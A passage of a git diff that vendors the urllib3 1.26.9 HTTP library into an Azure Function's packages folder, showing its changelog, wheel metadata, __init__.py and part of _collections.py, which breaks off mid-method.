+* ``ProxyManager`` requests now include non-default port in ``Host: ...``
+  header. (Issue #217)
+
+* Added HTTPS proxy support in ``ProxyManager``.
(Issue #170 #139) + +* New ``RequestField`` object can be passed to the ``fields=...`` param which + can specify headers. (Issue #220) + +* Raise ``urllib3.exceptions.ProxyError`` when connecting to proxy fails. + (Issue #221) + +* Use international headers when posting file names. (Issue #119) + +* Improved IPv6 support. (Issue #203) + + +1.6 (2013-04-25) +---------------- + +* Contrib: Optional SNI support for Py2 using PyOpenSSL. (Issue #156) + +* ``ProxyManager`` automatically adds ``Host: ...`` header if not given. + +* Improved SSL-related code. ``cert_req`` now optionally takes a string like + "REQUIRED" or "NONE". Same with ``ssl_version`` takes strings like "SSLv23" + The string values reflect the suffix of the respective constant variable. + (Issue #130) + +* Vendored ``socksipy`` now based on Anorov's fork which handles unexpectedly + closed proxy connections and larger read buffers. (Issue #135) + +* Ensure the connection is closed if no data is received, fixes connection leak + on some platforms. (Issue #133) + +* Added SNI support for SSL/TLS connections on Py32+. (Issue #89) + +* Tests fixed to be compatible with Py26 again. (Issue #125) + +* Added ability to choose SSL version by passing an ``ssl.PROTOCOL_*`` constant + to the ``ssl_version`` parameter of ``HTTPSConnectionPool``. (Issue #109) + +* Allow an explicit content type to be specified when encoding file fields. + (Issue #126) + +* Exceptions are now pickleable, with tests. (Issue #101) + +* Fixed default headers not getting passed in some cases. (Issue #99) + +* Treat "content-encoding" header value as case-insensitive, per RFC 2616 + Section 3.5. (Issue #110) + +* "Connection Refused" SocketErrors will get retried rather than raised. + (Issue #92) + +* Updated vendored ``six``, no longer overrides the global ``six`` module + namespace. (Issue #113) + +* ``urllib3.exceptions.MaxRetryError`` contains a ``reason`` property holding + the exception that prompted the final retry. If ``reason is None`` then it + was due to a redirect. (Issue #92, #114) + +* Fixed ``PoolManager.urlopen()`` from not redirecting more than once. + (Issue #149) + +* Don't assume ``Content-Type: text/plain`` for multi-part encoding parameters + that are not files. (Issue #111) + +* Pass `strict` param down to ``httplib.HTTPConnection``. (Issue #122) + +* Added mechanism to verify SSL certificates by fingerprint (md5, sha1) or + against an arbitrary hostname (when connecting by IP or for misconfigured + servers). (Issue #140) + +* Streaming decompression support. (Issue #159) + + +1.5 (2012-08-02) +---------------- + +* Added ``urllib3.add_stderr_logger()`` for quickly enabling STDERR debug + logging in urllib3. + +* Native full URL parsing (including auth, path, query, fragment) available in + ``urllib3.util.parse_url(url)``. + +* Built-in redirect will switch method to 'GET' if status code is 303. + (Issue #11) + +* ``urllib3.PoolManager`` strips the scheme and host before sending the request + uri. (Issue #8) + +* New ``urllib3.exceptions.DecodeError`` exception for when automatic decoding, + based on the Content-Type header, fails. + +* Fixed bug with pool depletion and leaking connections (Issue #76). Added + explicit connection closing on pool eviction. Added + ``urllib3.PoolManager.clear()``. + +* 99% -> 100% unit test coverage. + + +1.4 (2012-06-16) +---------------- + +* Minor AppEngine-related fixes. + +* Switched from ``mimetools.choose_boundary`` to ``uuid.uuid4()``. + +* Improved url parsing. (Issue #73) + +* IPv6 url support. 
(Issue #72) + + +1.3 (2012-03-25) +---------------- + +* Removed pre-1.0 deprecated API. + +* Refactored helpers into a ``urllib3.util`` submodule. + +* Fixed multipart encoding to support list-of-tuples for keys with multiple + values. (Issue #48) + +* Fixed multiple Set-Cookie headers in response not getting merged properly in + Python 3. (Issue #53) + +* AppEngine support with Py27. (Issue #61) + +* Minor ``encode_multipart_formdata`` fixes related to Python 3 strings vs + bytes. + + +1.2.2 (2012-02-06) +------------------ + +* Fixed packaging bug of not shipping ``test-requirements.txt``. (Issue #47) + + +1.2.1 (2012-02-05) +------------------ + +* Fixed another bug related to when ``ssl`` module is not available. (Issue #41) + +* Location parsing errors now raise ``urllib3.exceptions.LocationParseError`` + which inherits from ``ValueError``. + + +1.2 (2012-01-29) +---------------- + +* Added Python 3 support (tested on 3.2.2) + +* Dropped Python 2.5 support (tested on 2.6.7, 2.7.2) + +* Use ``select.poll`` instead of ``select.select`` for platforms that support + it. + +* Use ``Queue.LifoQueue`` instead of ``Queue.Queue`` for more aggressive + connection reusing. Configurable by overriding ``ConnectionPool.QueueCls``. + +* Fixed ``ImportError`` during install when ``ssl`` module is not available. + (Issue #41) + +* Fixed ``PoolManager`` redirects between schemes (such as HTTP -> HTTPS) not + completing properly. (Issue #28, uncovered by Issue #10 in v1.1) + +* Ported ``dummyserver`` to use ``tornado`` instead of ``webob`` + + ``eventlet``. Removed extraneous unsupported dummyserver testing backends. + Added socket-level tests. + +* More tests. Achievement Unlocked: 99% Coverage. + + +1.1 (2012-01-07) +---------------- + +* Refactored ``dummyserver`` to its own root namespace module (used for + testing). + +* Added hostname verification for ``VerifiedHTTPSConnection`` by vendoring in + Py32's ``ssl_match_hostname``. (Issue #25) + +* Fixed cross-host HTTP redirects when using ``PoolManager``. (Issue #10) + +* Fixed ``decode_content`` being ignored when set through ``urlopen``. (Issue + #27) + +* Fixed timeout-related bugs. (Issues #17, #23) + + +1.0.2 (2011-11-04) +------------------ + +* Fixed typo in ``VerifiedHTTPSConnection`` which would only present as a bug if + you're using the object manually. (Thanks pyos) + +* Made RecentlyUsedContainer (and consequently PoolManager) more thread-safe by + wrapping the access log in a mutex. (Thanks @christer) + +* Made RecentlyUsedContainer more dict-like (corrected ``__delitem__`` and + ``__getitem__`` behaviour), with tests. Shouldn't affect core urllib3 code. + + +1.0.1 (2011-10-10) +------------------ + +* Fixed a bug where the same connection would get returned into the pool twice, + causing extraneous "HttpConnectionPool is full" log warnings. + + +1.0 (2011-10-08) +---------------- + +* Added ``PoolManager`` with LRU expiration of connections (tested and + documented). +* Added ``ProxyManager`` (needs tests, docs, and confirmation that it works + with HTTPS proxies). +* Added optional partial-read support for responses when + ``preload_content=False``. You can now make requests and just read the headers + without loading the content. +* Made response decoding optional (default on, same as before). +* Added optional explicit boundary string for ``encode_multipart_formdata``. +* Convenience request methods are now inherited from ``RequestMethods``. 
Old + helpers like ``get_url`` and ``post_url`` should be abandoned in favour of + the new ``request(method, url, ...)``. +* Refactored code to be even more decoupled, reusable, and extendable. +* License header added to ``.py`` files. +* Embiggened the documentation: Lots of Sphinx-friendly docstrings in the code + and docs in ``docs/`` and on https://urllib3.readthedocs.io/. +* Embettered all the things! +* Started writing this file. + + +0.4.1 (2011-07-17) +------------------ + +* Minor bug fixes, code cleanup. + + +0.4 (2011-03-01) +---------------- + +* Better unicode support. +* Added ``VerifiedHTTPSConnection``. +* Added ``NTLMConnectionPool`` in contrib. +* Minor improvements. + + +0.3.1 (2010-07-13) +------------------ + +* Added ``assert_host_name`` optional parameter. Now compatible with proxies. + + +0.3 (2009-12-10) +---------------- + +* Added HTTPS support. +* Minor bug fixes. +* Refactored, broken backwards compatibility with 0.2. +* API to be treated as stable from this version forward. + + +0.2 (2008-11-17) +---------------- + +* Added unit tests. +* Bug fixes. + + +0.1 (2008-11-16) +---------------- + +* First release. + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/RECORD new file mode 100644 index 0000000..690c42e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/RECORD @@ -0,0 +1,82 @@ +urllib3-1.26.9.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +urllib3-1.26.9.dist-info/LICENSE.txt,sha256=w3vxhuJ8-dvpYZ5V7f486nswCRzrPaY8fay-Dm13kHs,1115 +urllib3-1.26.9.dist-info/METADATA,sha256=UicmDwTLIrYL2O4fOBvq8wxMMAwM2L8JYP75jEXt8DQ,46325 +urllib3-1.26.9.dist-info/RECORD,, +urllib3-1.26.9.dist-info/WHEEL,sha256=z9j0xAa_JmUKMpmz72K0ZGALSM_n-wQVmGbleXx2VHg,110 +urllib3-1.26.9.dist-info/top_level.txt,sha256=EMiXL2sKrTcmrMxIHTqdc3ET54pQI2Y072LexFEemvo,8 +urllib3/__init__.py,sha256=j3yzHIbmW7CS-IKQJ9-PPQf_YKO8EOAey_rMW0UR7us,2763 +urllib3/__pycache__/__init__.cpython-39.pyc,, +urllib3/__pycache__/_collections.cpython-39.pyc,, +urllib3/__pycache__/_version.cpython-39.pyc,, +urllib3/__pycache__/connection.cpython-39.pyc,, +urllib3/__pycache__/connectionpool.cpython-39.pyc,, +urllib3/__pycache__/exceptions.cpython-39.pyc,, +urllib3/__pycache__/fields.cpython-39.pyc,, +urllib3/__pycache__/filepost.cpython-39.pyc,, +urllib3/__pycache__/poolmanager.cpython-39.pyc,, +urllib3/__pycache__/request.cpython-39.pyc,, +urllib3/__pycache__/response.cpython-39.pyc,, +urllib3/_collections.py,sha256=Rp1mVyBgc_UlAcp6M3at1skJBXR5J43NawRTvW2g_XY,10811 +urllib3/_version.py,sha256=WE7GLYd0IVwgk-1gQZ-7jw00bCUYjYTIlcWIk7NOhEM,63 +urllib3/connection.py,sha256=mMuCIjdG01kRpFUENwJRoDKmYer7CZO56pfTbBCS7cw,20070 +urllib3/connectionpool.py,sha256=qz-ICrW6g4TZVCbDQ8fRe68BMpXkskkR9vAVY9zUWtA,39013 +urllib3/contrib/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +urllib3/contrib/__pycache__/__init__.cpython-39.pyc,, +urllib3/contrib/__pycache__/_appengine_environ.cpython-39.pyc,, +urllib3/contrib/__pycache__/appengine.cpython-39.pyc,, +urllib3/contrib/__pycache__/ntlmpool.cpython-39.pyc,, +urllib3/contrib/__pycache__/pyopenssl.cpython-39.pyc,, +urllib3/contrib/__pycache__/securetransport.cpython-39.pyc,, +urllib3/contrib/__pycache__/socks.cpython-39.pyc,, 
+urllib3/contrib/_appengine_environ.py,sha256=bDbyOEhW2CKLJcQqAKAyrEHN-aklsyHFKq6vF8ZFsmk,957 +urllib3/contrib/_securetransport/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +urllib3/contrib/_securetransport/__pycache__/__init__.cpython-39.pyc,, +urllib3/contrib/_securetransport/__pycache__/bindings.cpython-39.pyc,, +urllib3/contrib/_securetransport/__pycache__/low_level.cpython-39.pyc,, +urllib3/contrib/_securetransport/bindings.py,sha256=4Xk64qIkPBt09A5q-RIFUuDhNc9mXilVapm7WnYnzRw,17632 +urllib3/contrib/_securetransport/low_level.py,sha256=B2JBB2_NRP02xK6DCa1Pa9IuxrPwxzDzZbixQkb7U9M,13922 +urllib3/contrib/appengine.py,sha256=jz515jZYBDFTnhR4zqfeaCo6JdDgAQqYbqzHK9sDkfw,11010 +urllib3/contrib/ntlmpool.py,sha256=ej9gGvfAb2Gt00lafFp45SIoRz-QwrQ4WChm6gQmAlM,4538 +urllib3/contrib/pyopenssl.py,sha256=YIMyTiXiLPV_QfFw3PjZ31mGqJmM5EzxIjhSLxZ7VUM,16874 +urllib3/contrib/securetransport.py,sha256=izdx43gFoUGFSgxasZlOCL42FaM4vSsAVTmhO0EH1vM,34417 +urllib3/contrib/socks.py,sha256=aRi9eWXo9ZEb95XUxef4Z21CFlnnjbEiAo9HOseoMt4,7097 +urllib3/exceptions.py,sha256=0Mnno3KHTNfXRfY7638NufOPkUb6mXOm-Lqj-4x2w8A,8217 +urllib3/fields.py,sha256=kvLDCg_JmH1lLjUUEY_FLS8UhY7hBvDPuVETbY8mdrM,8579 +urllib3/filepost.py,sha256=5b_qqgRHVlL7uLtdAYBzBh-GHmU5AfJVt_2N0XS3PeY,2440 +urllib3/packages/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +urllib3/packages/__pycache__/__init__.cpython-39.pyc,, +urllib3/packages/__pycache__/six.cpython-39.pyc,, +urllib3/packages/backports/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +urllib3/packages/backports/__pycache__/__init__.cpython-39.pyc,, +urllib3/packages/backports/__pycache__/makefile.cpython-39.pyc,, +urllib3/packages/backports/makefile.py,sha256=nbzt3i0agPVP07jqqgjhaYjMmuAi_W5E0EywZivVO8E,1417 +urllib3/packages/six.py,sha256=1LVW7ljqRirFlfExjwl-v1B7vSAUNTmzGMs-qays2zg,34666 +urllib3/poolmanager.py,sha256=0KOOJECoeLYVjUHvv-0h4Oq3FFQQ2yb-Fnjkbj8gJO0,19786 +urllib3/request.py,sha256=ZFSIqX0C6WizixecChZ3_okyu7BEv0lZu1VT0s6h4SM,5985 +urllib3/response.py,sha256=9b5NrbzHDnC2l_QC9uuNQPv75is1qgLa7M3Ax4Zr9z8,28276 +urllib3/util/__init__.py,sha256=JEmSmmqqLyaw8P51gUImZh8Gwg9i1zSe-DoqAitn2nc,1155 +urllib3/util/__pycache__/__init__.cpython-39.pyc,, +urllib3/util/__pycache__/connection.cpython-39.pyc,, +urllib3/util/__pycache__/proxy.cpython-39.pyc,, +urllib3/util/__pycache__/queue.cpython-39.pyc,, +urllib3/util/__pycache__/request.cpython-39.pyc,, +urllib3/util/__pycache__/response.cpython-39.pyc,, +urllib3/util/__pycache__/retry.cpython-39.pyc,, +urllib3/util/__pycache__/ssl_.cpython-39.pyc,, +urllib3/util/__pycache__/ssl_match_hostname.cpython-39.pyc,, +urllib3/util/__pycache__/ssltransport.cpython-39.pyc,, +urllib3/util/__pycache__/timeout.cpython-39.pyc,, +urllib3/util/__pycache__/url.cpython-39.pyc,, +urllib3/util/__pycache__/wait.cpython-39.pyc,, +urllib3/util/connection.py,sha256=5Lx2B1PW29KxBn2T0xkN1CBgRBa3gGVJBKoQoRogEVk,4901 +urllib3/util/proxy.py,sha256=zUvPPCJrp6dOF0N4GAVbOcl6o-4uXKSrGiTkkr5vUS4,1605 +urllib3/util/queue.py,sha256=nRgX8_eX-_VkvxoX096QWoz8Ps0QHUAExILCY_7PncM,498 +urllib3/util/request.py,sha256=fWiAaa8pwdLLIqoTLBxCC2e4ed80muzKU3e3HWWTzFQ,4225 +urllib3/util/response.py,sha256=GJpg3Egi9qaJXRwBh5wv-MNuRWan5BIu40oReoxWP28,3510 +urllib3/util/retry.py,sha256=iESg2PvViNdXBRY4MpL4h0kqwOOkHkxmLn1kkhFHPU8,22001 +urllib3/util/ssl_.py,sha256=c0sYiSC6272r6uPkxQpo5rYPP9QC1eR6oI7004gYqZo,17165 +urllib3/util/ssl_match_hostname.py,sha256=Ir4cZVEjmAk8gUAIHWSi7wtOO83UCYABY2xFD1Ql_WA,5758 
+urllib3/util/ssltransport.py,sha256=NA-u5rMTrDFDFC8QzRKUEKMG0561hOD4qBTr3Z4pv6E,6895 +urllib3/util/timeout.py,sha256=QSbBUNOB9yh6AnDn61SrLQ0hg5oz0I9-uXEG91AJuIg,10003 +urllib3/util/url.py,sha256=au9jkUMnVr9Qp_9kg4HfZx9q9ur6yXQ4u5M17In-UKY,14030 +urllib3/util/wait.py,sha256=3MUKRSAUJDB2tgco7qRUskW0zXGAWYvRRE4Q1_6xlLs,5404 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/WHEEL new file mode 100644 index 0000000..5b8c32a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/WHEEL @@ -0,0 +1,6 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.1) +Root-Is-Purelib: true +Tag: py2-none-any +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/top_level.txt new file mode 100644 index 0000000..e8df8e7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/top_level.txt @@ -0,0 +1 @@ +urllib3 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__init__.py new file mode 100644 index 0000000..c9d28bf --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__init__.py @@ -0,0 +1,85 @@ +""" +Python HTTP library with thread-safe connection pooling, file post support, user friendly, and more +""" +from __future__ import absolute_import + +# Set default logging handler to avoid "No handler found" warnings. +import logging +import warnings +from logging import NullHandler + +from . import exceptions +from ._version import __version__ +from .connectionpool import HTTPConnectionPool, HTTPSConnectionPool, connection_from_url +from .filepost import encode_multipart_formdata +from .poolmanager import PoolManager, ProxyManager, proxy_from_url +from .response import HTTPResponse +from .util.request import make_headers +from .util.retry import Retry +from .util.timeout import Timeout +from .util.url import get_host + +__author__ = "Andrey Petrov (andrey.petrov@shazow.net)" +__license__ = "MIT" +__version__ = __version__ + +__all__ = ( + "HTTPConnectionPool", + "HTTPSConnectionPool", + "PoolManager", + "ProxyManager", + "HTTPResponse", + "Retry", + "Timeout", + "add_stderr_logger", + "connection_from_url", + "disable_warnings", + "encode_multipart_formdata", + "get_host", + "make_headers", + "proxy_from_url", +) + +logging.getLogger(__name__).addHandler(NullHandler()) + + +def add_stderr_logger(level=logging.DEBUG): + """ + Helper for quickly adding a StreamHandler to the logger. Useful for + debugging. + + Returns the handler after adding it. + """ + # This method needs to be in this __init__.py to get the __name__ correct + # even if urllib3 is vendored within another package. 
+ logger = logging.getLogger(__name__) + handler = logging.StreamHandler() + handler.setFormatter(logging.Formatter("%(asctime)s %(levelname)s %(message)s")) + logger.addHandler(handler) + logger.setLevel(level) + logger.debug("Added a stderr logging handler to logger: %s", __name__) + return handler + + +# ... Clean up. +del NullHandler + + +# All warning filters *must* be appended unless you're really certain that they +# shouldn't be: otherwise, it's very hard for users to use most Python +# mechanisms to silence them. +# SecurityWarning's always go off by default. +warnings.simplefilter("always", exceptions.SecurityWarning, append=True) +# SubjectAltNameWarning's should go off once per host +warnings.simplefilter("default", exceptions.SubjectAltNameWarning, append=True) +# InsecurePlatformWarning's don't vary between requests, so we keep it default. +warnings.simplefilter("default", exceptions.InsecurePlatformWarning, append=True) +# SNIMissingWarnings should go off only once. +warnings.simplefilter("default", exceptions.SNIMissingWarning, append=True) + + +def disable_warnings(category=exceptions.HTTPWarning): + """ + Helper for quickly disabling all urllib3 warnings. + """ + warnings.simplefilter("ignore", category) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..d265ad2 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/_collections.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/_collections.cpython-39.pyc new file mode 100644 index 0000000..3aa7195 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/_collections.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/_version.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/_version.cpython-39.pyc new file mode 100644 index 0000000..ef2e2c5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/_version.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/connection.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/connection.cpython-39.pyc new file mode 100644 index 0000000..e5e0580 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/connection.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/connectionpool.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/connectionpool.cpython-39.pyc new file mode 100644 index 0000000..8156a0b Binary files /dev/null and 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/connectionpool.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/exceptions.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/exceptions.cpython-39.pyc new file mode 100644 index 0000000..48132e3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/exceptions.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/fields.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/fields.cpython-39.pyc new file mode 100644 index 0000000..a23437c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/fields.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/filepost.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/filepost.cpython-39.pyc new file mode 100644 index 0000000..65d5357 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/filepost.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/poolmanager.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/poolmanager.cpython-39.pyc new file mode 100644 index 0000000..8e2d545 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/poolmanager.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/request.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/request.cpython-39.pyc new file mode 100644 index 0000000..03ff6b4 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/request.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/response.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/response.cpython-39.pyc new file mode 100644 index 0000000..be5a6e6 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/response.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/_collections.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/_collections.py new file mode 100644 index 0000000..eaa8755 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/_collections.py @@ -0,0 +1,337 @@ +from __future__ import absolute_import + +try: + from collections.abc import Mapping, MutableMapping +except ImportError: + from collections import 
Mapping, MutableMapping +try: + from threading import RLock +except ImportError: # Platform-specific: No threads available + + class RLock: + def __enter__(self): + pass + + def __exit__(self, exc_type, exc_value, traceback): + pass + + +from collections import OrderedDict + +from .exceptions import InvalidHeader +from .packages import six +from .packages.six import iterkeys, itervalues + +__all__ = ["RecentlyUsedContainer", "HTTPHeaderDict"] + + +_Null = object() + + +class RecentlyUsedContainer(MutableMapping): + """ + Provides a thread-safe dict-like container which maintains up to + ``maxsize`` keys while throwing away the least-recently-used keys beyond + ``maxsize``. + + :param maxsize: + Maximum number of recent elements to retain. + + :param dispose_func: + Every time an item is evicted from the container, + ``dispose_func(value)`` is called. Callback which will get called + """ + + ContainerCls = OrderedDict + + def __init__(self, maxsize=10, dispose_func=None): + self._maxsize = maxsize + self.dispose_func = dispose_func + + self._container = self.ContainerCls() + self.lock = RLock() + + def __getitem__(self, key): + # Re-insert the item, moving it to the end of the eviction line. + with self.lock: + item = self._container.pop(key) + self._container[key] = item + return item + + def __setitem__(self, key, value): + evicted_value = _Null + with self.lock: + # Possibly evict the existing value of 'key' + evicted_value = self._container.get(key, _Null) + self._container[key] = value + + # If we didn't evict an existing value, we might have to evict the + # least recently used item from the beginning of the container. + if len(self._container) > self._maxsize: + _key, evicted_value = self._container.popitem(last=False) + + if self.dispose_func and evicted_value is not _Null: + self.dispose_func(evicted_value) + + def __delitem__(self, key): + with self.lock: + value = self._container.pop(key) + + if self.dispose_func: + self.dispose_func(value) + + def __len__(self): + with self.lock: + return len(self._container) + + def __iter__(self): + raise NotImplementedError( + "Iteration over this class is unlikely to be threadsafe." + ) + + def clear(self): + with self.lock: + # Copy pointers to all values, then wipe the mapping + values = list(itervalues(self._container)) + self._container.clear() + + if self.dispose_func: + for value in values: + self.dispose_func(value) + + def keys(self): + with self.lock: + return list(iterkeys(self._container)) + + +class HTTPHeaderDict(MutableMapping): + """ + :param headers: + An iterable of field-value pairs. Must not contain multiple field names + when compared case-insensitively. + + :param kwargs: + Additional field-value pairs to pass in to ``dict.update``. + + A ``dict`` like container for storing HTTP Headers. + + Field names are stored and compared case-insensitively in compliance with + RFC 7230. Iteration provides the first case-sensitive key seen for each + case-insensitive pair. + + Using ``__setitem__`` syntax overwrites fields that compare equal + case-insensitively in order to maintain ``dict``'s api. For fields that + compare equal, instead create a new ``HTTPHeaderDict`` and use ``.add`` + in a loop. + + If multiple fields that are equal case-insensitively are passed to the + constructor or ``.update``, the behavior is undefined and some will be + lost. 
+ + >>> headers = HTTPHeaderDict() + >>> headers.add('Set-Cookie', 'foo=bar') + >>> headers.add('set-cookie', 'baz=quxx') + >>> headers['content-length'] = '7' + >>> headers['SET-cookie'] + 'foo=bar, baz=quxx' + >>> headers['Content-Length'] + '7' + """ + + def __init__(self, headers=None, **kwargs): + super(HTTPHeaderDict, self).__init__() + self._container = OrderedDict() + if headers is not None: + if isinstance(headers, HTTPHeaderDict): + self._copy_from(headers) + else: + self.extend(headers) + if kwargs: + self.extend(kwargs) + + def __setitem__(self, key, val): + self._container[key.lower()] = [key, val] + return self._container[key.lower()] + + def __getitem__(self, key): + val = self._container[key.lower()] + return ", ".join(val[1:]) + + def __delitem__(self, key): + del self._container[key.lower()] + + def __contains__(self, key): + return key.lower() in self._container + + def __eq__(self, other): + if not isinstance(other, Mapping) and not hasattr(other, "keys"): + return False + if not isinstance(other, type(self)): + other = type(self)(other) + return dict((k.lower(), v) for k, v in self.itermerged()) == dict( + (k.lower(), v) for k, v in other.itermerged() + ) + + def __ne__(self, other): + return not self.__eq__(other) + + if six.PY2: # Python 2 + iterkeys = MutableMapping.iterkeys + itervalues = MutableMapping.itervalues + + __marker = object() + + def __len__(self): + return len(self._container) + + def __iter__(self): + # Only provide the originally cased names + for vals in self._container.values(): + yield vals[0] + + def pop(self, key, default=__marker): + """D.pop(k[,d]) -> v, remove specified key and return the corresponding value. + If key is not found, d is returned if given, otherwise KeyError is raised. + """ + # Using the MutableMapping function directly fails due to the private marker. + # Using ordinary dict.pop would expose the internal structures. + # So let's reinvent the wheel. + try: + value = self[key] + except KeyError: + if default is self.__marker: + raise + return default + else: + del self[key] + return value + + def discard(self, key): + try: + del self[key] + except KeyError: + pass + + def add(self, key, val): + """Adds a (name, value) pair, doesn't overwrite the value if it already + exists. + + >>> headers = HTTPHeaderDict(foo='bar') + >>> headers.add('Foo', 'baz') + >>> headers['foo'] + 'bar, baz' + """ + key_lower = key.lower() + new_vals = [key, val] + # Keep the common case aka no item present as fast as possible + vals = self._container.setdefault(key_lower, new_vals) + if new_vals is not vals: + vals.append(val) + + def extend(self, *args, **kwargs): + """Generic import function for any type of header-like object. + Adapted version of MutableMapping.update in order to insert items + with self.add instead of self.__setitem__ + """ + if len(args) > 1: + raise TypeError( + "extend() takes at most 1 positional " + "arguments ({0} given)".format(len(args)) + ) + other = args[0] if len(args) >= 1 else () + + if isinstance(other, HTTPHeaderDict): + for key, val in other.iteritems(): + self.add(key, val) + elif isinstance(other, Mapping): + for key in other: + self.add(key, other[key]) + elif hasattr(other, "keys"): + for key in other.keys(): + self.add(key, other[key]) + else: + for key, value in other: + self.add(key, value) + + for key, value in kwargs.items(): + self.add(key, value) + + def getlist(self, key, default=__marker): + """Returns a list of all the values for the named field. 
Returns an + empty list if the key doesn't exist.""" + try: + vals = self._container[key.lower()] + except KeyError: + if default is self.__marker: + return [] + return default + else: + return vals[1:] + + # Backwards compatibility for httplib + getheaders = getlist + getallmatchingheaders = getlist + iget = getlist + + # Backwards compatibility for http.cookiejar + get_all = getlist + + def __repr__(self): + return "%s(%s)" % (type(self).__name__, dict(self.itermerged())) + + def _copy_from(self, other): + for key in other: + val = other.getlist(key) + if isinstance(val, list): + # Don't need to convert tuples + val = list(val) + self._container[key.lower()] = [key] + val + + def copy(self): + clone = type(self)() + clone._copy_from(self) + return clone + + def iteritems(self): + """Iterate over all header lines, including duplicate ones.""" + for key in self: + vals = self._container[key.lower()] + for val in vals[1:]: + yield vals[0], val + + def itermerged(self): + """Iterate over all headers, merging duplicate ones together.""" + for key in self: + val = self._container[key.lower()] + yield val[0], ", ".join(val[1:]) + + def items(self): + return 